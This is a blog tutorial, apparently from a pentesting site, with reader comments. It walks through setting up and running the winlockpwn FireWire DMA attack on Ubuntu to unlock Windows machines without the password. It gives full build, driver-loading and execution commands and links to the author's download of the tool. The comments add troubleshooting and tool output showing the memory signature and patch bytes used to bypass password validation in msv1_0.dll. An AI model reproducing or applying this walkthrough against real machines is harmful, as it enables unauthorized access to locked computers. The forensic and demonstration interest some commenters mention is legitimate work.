Posted by & filed under Hacking & Pentesting, Hacks, Tools & Methodology.

Update: I’ve released a tool at github called Inception, which uses libforensic1394 to unlock Windows XP, Vista and Windows 7 boxes. IMNSHO, it is much more stable than winlockpwn, easier to use and works against a wider spectrum of target operating systems.

Quite regularly I’m being asked to demonstrate the FireWire attack made by MetlStorm aka Adam Boileau (http://www.storm.net.nz/projects/16 [site down as of May 20]) where an attacker unlocks a Windows machine by writing to the victim machine’s memory via FireWire. It’s kind of a party trick hack, but it never stops to amaze people. A couple of days ago I demonstrated the trick at AFSecurity, and I was asked if it was easy to find a good description on how to do it.

Well, sort of. There’s an excellent guide here, but several of the commands does not work out of the box on Ubuntu anymore, so I’ve created this little tutorial. All hail to Tim for creating the original. Also, the original source of the tool have disappeared from the net, so I’ve started hosting my own version of the tool right here. Metlstorm, if you read this, apologies in advance. Let me buy you a beer sometime! Or get your site up again :-)

So here’s how to do the hack on Ubuntu 11.04 (Natty Narwhal) Ubuntu 10.10 (Maverick Meerkat):

(Update: According to this thread, the raw1394 device is no longer supported as of Ubuntu 11.04, I’ll try to figure out how to use the tool with the new FireWire stack (JuJu)).

Get the dependencies

First, get the stuff we need to be able to compile the winlockpwn tool and necessary FireWire driver:

sudo apt-get install build-essential linux-headers-$(uname -r) libdc1394-22 libraw1394-dev swig

Secondly, we need to download and compile Python 2.3:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
cd Python-2.3.6
./configure

Now, since this old python version has several potential buffer overflow vulnerabilities, we have to tell gcc to quietly ignore them by editing the Makefile. Open the makefile in your favourite text editor, and change the following lines:

BASECFLAGS=      -fno-strict-aliasing

To:

BASECFLAGS=      -fno-strict-aliasing -fno-stack-protector -U_FORTIFY_SOURCE

Then compile and make an alternative install (that will make the new (old) python libraries co-reside nicely with your existing python libraries):

make
sudo make altinstall

Fix up the libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

Search for and comment out all references to the ‘__attribute__ ((deprecated));’ and be sure to put an ending semicolon on the previous line.

Download and install winlockpwn

Since Adam Bolieu’s site is down, I’ve taken the liberty of hosting the tool files here. I’ve also added some more csr’s and signatures for Windows XP SP3, Vista 32 and 64-bit, Ubuntu 9.04 and Windows 7 32 and 64-bit. Woohoo!

wget http://www.breaknenter.org/files/winlockpwn/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.breaknenter.org/files/winlockpwn/winlockpwn
chmod +x ./winlockpwn
vim Makefile (reference /usr/local/bin/python2.3 instead of /usr for python)
make

Unload the default Ubuntu FireWire drivers and load your own:

sudo modprobe -r firewire_ohci
sudo modprobe -r firewire_core
sudo modprobe ohci1394
sudo modprobe raw1394

Give write permissions to the firewire device:

sudo chmod 666 /dev/raw1394

Edit the first line of the files romtool, businfo and winlockpwn to reference the python 2.3 location as installed above, then load the ipod image (or any of the other csr’s) to the firewire port:

sudo ./romtool -s 0 ipod.csr

Run businfo to check the port configurations:

sudo ./businfo

Check the node list. Node 0 is the Windows machine, node 1 should be the fake iPod. Connect to the Windows machine using a firewire cable, and watch as Windows loads the firewire drivers, recognizes the iPod and gives it DMS. At last, run winlockpwn (example parameters below):

sudo ./winlockpwn 0 0 2

You can get a quick explanation of the winlockpwn parameters by running the command without parameters. If you’re having trouble getting DMA access, try some of the other ROM csr’s. Also, verify that no other firewire drivers (than the ones loaded above) are present by issuing the following commands:

lsmod | grep 1394
lsmod | grep firewire

14 Responses to “winlockpwn on Ubuntu”

  1. nino

    Hi Carsten

    Ive just updated to 11.04 and im having issues getting the raw1394 module to load:

    sudo modprobe raw1394
    FATAL: Module raw1394 not found.

    raw1394 is deffinetly installed:

    sudo apt-get install libraw1394-dev
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    libraw1394-dev is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 174 not upgraded.

    Id appreciate if you could give me some pointers!

    Reply
    • Carsten

      Did you issue the modprobe command from the directory where you compiled winlockpwn? You should have a ‘raw1394.ko’ kernel module there if I’m not mistaken, but I’ll check when I have access to my Ubuntu box.

      Reply
      • nino

        Hi Carsten

        I only have:
        raw1394.i
        raw1394.pyc
        raw1394_wrap.c

        There isnt a raw1394.ko anywhere on the system, apparently the support has been removed from the later kernels.

        Im giving a demo tomorrow so i might need to format and go back down to 9.10 :(

        Reply
        • Carsten

          Haven’t tried the tool on the newest ubuntu release yet (there was a typo in the guide stating that it was for Natty, while I’ve only tested this on Ubuntu 10.10 (Maverick Meerkat)), so unfortunately I’m unable to help you. But I’ll check today if I can make it work on Natty as well.

          I’m currently developing my own tool that is much more stable, although it’s unfinished. It’s available at github in a pre-alpha release: https://github.com/carmaa/FTWAutopwn

          It only includes signatures for Win7 at the moment, but you can copy other signatures from the winlockpwn tool.

          It requires python3.2 and libforensic1394, check the readme file.

          Reply
      • Vishal

        Hello Carsten,

        I am working on my research project on the Forensic Firewire topic but when I run the following command as:

        sudo modprobe ohci1394
        sudo modprobe raw1394

        It gives me error as “Module raw1394 not found”.

        Can you please help me out whats my mistake.

        Thanks..

        Reply
          • Vishal

            Hello Carsten,

            As per your suggestion I used the “ftwautopwn” tools and the procedure suggested by you, but after the complete attack I get an output as “Attack Unsuccessful” as no signature was found. I tried this on Mac Book Pro (Snow Leopard 10.6.8) and even on Windows 7 SP1 Home Edition.

            Can you please help me for the same. Because I am stuck on the same. Actually my main task is to capture the RAM memory (volatile memory) but I am unsuccessful. Can you please help me I will be very thankful to you.

            Please reply ASAP.

            Thanks

    • Carsten

      Tried winlockpwn on Natty last night, didn’t pan out. Seems like the new FW stack doesn’t include raw1394 anymore. Let me do some digging to see if it’s possible to fetch the old stack from somewhere and load it.

      Reply
  2. firedart

    I’m having trouble getting FTWautopwn to work on BackTrack 5. Could you possibly provide step-by-step instructions for getting it working from a fresh install of Backtrack5 please? Including how to install Python 3.2.1 and libforensic1394 to the right place, where to put ftwautopwn.py, what other files I need from your github page etc. My linux skills are poor!

    Reply
  3. jan

    I am having trouble getting this to work. The SBP2 device shows up in the device manager of the target machine, as well as a disk drive (UNKNOWN VENDOR AND MODEL) with a yellow question mark on it. It says ‘cannot start’. the error I get is:

    Please select target (or enter ‘q’ to quit): 6
    [+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    Phase 1:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x8aa (2218)
    Phase 2:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0×862 (2146)
    Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
    File “./ftwautopwn.py”, line 80, in
    main(sys.argv[1:])
    File “./ftwautopwn.py”, line 76, in main
    unlock.run(ctx)
    File “/home/jan/FTWAutopwn/ftwautopwn/unlock.py”, line 129, in run
    d = initialize_fw(d)
    File “/home/jan/FTWAutopwn/ftwautopwn/unlock.py”, line 254, in initialize_fw
    d = b.devices()[0]
    IndexError: list index out of range

    any ideas?

    Reply

Trackbacks/Pingbacks

  1.  Alternative to winlockpwn: libforensic1394 | Break & Enter

Leave a Reply

  • (will not be published)